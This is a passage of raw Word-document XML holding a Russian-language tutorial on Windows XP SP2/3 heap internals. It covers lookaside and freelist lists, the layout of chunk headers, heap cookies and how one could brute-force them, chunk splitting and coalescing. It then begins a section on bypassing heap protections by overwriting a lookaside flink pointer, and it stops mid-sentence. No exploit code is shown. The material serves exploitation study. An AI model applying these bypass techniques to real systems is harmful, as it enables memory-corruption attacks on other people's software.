        <w:t xml:space="preserve">-либо из проверок не проходит, производится прыжок по адресу 0x7c936934 в ntdll.dll. Как можете заметить, это почти то же самое, что мы делали при обычном разрыве связи, за исключением того, что теперь проверяется flink/blink. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Freelist header cookies:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>Еще</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> в SP2 появился механизм, добавляющий в заголовок чанка по смещеню 0x5 рандомный куки. Тол</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ь</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ко чанки в</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>о</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> freelist проверяются на них. Ниже показан чанк с подвеченной кукой. Это рандомный байт, поэтому имеет всего 256 возможных значений. Помните, что в многозадачной среде вы можете просто перебрать его брутфорсом.</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342765" cy="236156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342765" cy="2361565"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Фронтэнд аллокатор - lookaside</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Список lookaside является односвязным и хранит чанки размером до 1016 байт (max: 1024-8). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>Это</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> нужн</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>о</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> для ускорения поиска </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>свободного чанка</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">. Оно достигается, когда приложение использует множество вызовов HeapAlloc() и HeapFree() во время выполнения. Поскольку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>проход по списку</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> должен быть быстрым, в одном его элементе может хранить</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ся</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> не больше 3 свободных чанков. Если при вызове HeapFree() в списке уже есть 3 элемента с таким размером, то освобождаемый чанк добавляется во freelist[n].</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Размер чанка кучи всегда рассчитывается как размер аллокации + дополнительные 8 байт на заголовок. Тогда при запросе 16 байт в списке lookaside будет искаться 24-байтный чанк (16 + заголовок). В случае, описанном диаграмой ниже, менеджер кучи найдет такой чанк во втором элементе списка.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>lookaside хранит только flink, указывающий на следующий чанк данных.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9972" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="55" w:type="dxa"/>
          <w:left w:w="55" w:type="dxa"/>
          <w:bottom w:w="55" w:type="dxa"/>
          <w:right w:w="55" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1424"/>
        <w:gridCol w:w="1425"/>
        <w:gridCol w:w="1560"/>
        <w:gridCol w:w="1289"/>
        <w:gridCol w:w="1317"/>
        <w:gridCol w:w="1532"/>
        <w:gridCol w:w="1424"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1424" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContent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Заголовки</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1425" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:strike w:val="false"/>
                <w:dstrike w:val="false"/>
                <w:outline w:val="false"/>
                <w:shadow w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">Размер </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:strike w:val="false"/>
                <w:dstrike w:val="false"/>
                <w:outline w:val="false"/>
                <w:shadow w:val="false"/>
                <w:color w:val="000000"/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">текушего </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:strike w:val="false"/>
                <w:dstrike w:val="false"/>
                <w:outline w:val="false"/>
                <w:shadow w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>(0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:strike w:val="false"/>
                <w:dstrike w:val="false"/>
                <w:outline w:val="false"/>
                <w:shadow w:val="false"/>
                <w:color w:val="000000"/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
              </w:rPr>
              <w:t>x</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:strike w:val="false"/>
                <w:dstrike w:val="false"/>
                <w:outline w:val="false"/>
                <w:shadow w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom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Размер предыдущего (0x2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1289" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom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Индекс сегмента (0x1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1317" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom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Флаг (0x1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1532" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:strike w:val="false"/>
                <w:dstrike w:val="false"/>
                <w:outline w:val="false"/>
                <w:shadow w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>Не используется (0x1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1424"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jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:strike w:val="false"/>
                <w:dstrike w:val="false"/>
                <w:outline w:val="false"/>
                <w:shadow w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>Индекс тега (0x1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1424" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContent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flink/blink</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2985" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom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flink (0x4) </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5562" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1424" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>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Данные</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8547" w:type="dxa"/>
            <w:gridSpan w:val="6"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="cente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pPr>
      <w:r>
        <w:rPr/>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041265" cy="286956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041265" cy="2869565"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Когда менеджеру кучи приходит запрос на аллокацию, он ищет удовлетворяющие ему свободные чанки. Для ускорения и оптимизации менеджер сперва пройдётся по списку lookaside. Если там его не найдётся, будет использован бэкэнд аллокатор. В этом случае будет произведён проход по списку freelist, начиная с freelist[1] до freelist[127]. Если свободный чанк не найдётся, чанк с большим размером </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">будет искаться во freelist[0]. Этот чанк </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">затем будет </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">разделён. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Запрошенная </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">часть будет возвращена менеджеру, а остатки отправятся во freelist[n] (n определяется по количествую оставшихся байтов). Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>приводит</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> нас к следующей части: операциям кучи.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Базовые операции кучи</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Разделение чанка</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Про</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>ц</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">есс получения из freelist[n] большого чанка, который разбивается на маленькие. Если полученный чанк больше запрошенного размера, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">он </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>разбивается так, чтобы удовлетворить запрос.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Предположим во freelist[0] лежит всего один чанк размером 2048 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>б</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">айт. Если запрашивается выделение 1024 байт (с учётом заголовка), тогда </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>он</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>разделяется:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> один кусок в 1024 байта отправлятеся назад во freelist[0], а другой возвращается.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Слияние кучи</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Процесс объединение трёх соседних свободных чанков в один. Происходит при освобождении среднего из них, два боковых должны уже быть свободными.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Причина, по которой это делается, заключается в эффективном использовании сегемента памяти. Разумеется, освобождение чанков не всегда эффективно. Слияние кучи является очень важной операци</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>е</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>й, поскольку при этом несколько свободных чанков объединяются в один, который может быть позже использован для аллокации бОльшего размера позднее. Если этого не делать, сегмент будет заполнят</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ь</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ся неиспользуемыми чанками </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">и будет всё больше и больше </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>фрагментирован.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Методы обхода механизмов защиты Windows XP SP2/3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Перезапись чанка в lookaside</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Этот самый распространённый метод обхода кук и безопасного разрыва связи в списке. Несмотря на то, что </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>успех выполнения</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> зависит от приложения, в котором он используется, некоторые из них позволяют изучить </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">текущую </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>структуру кучи, чтобы быть уверенным в надёжности эксплуатации. Поскольк</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">у </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>в lookas</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>de не производ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>я</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">тся проверка на разрыв связи </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> проверка кук, атакующий может переписать указатель flink в соседнем элементе и вернуть его через HeapAlloc() или HeapFree(), чтобы позже записать вредоносный код в следующий доступный чанк.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Давайте посмотрим, как это работает. </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Сделайте </w:t>
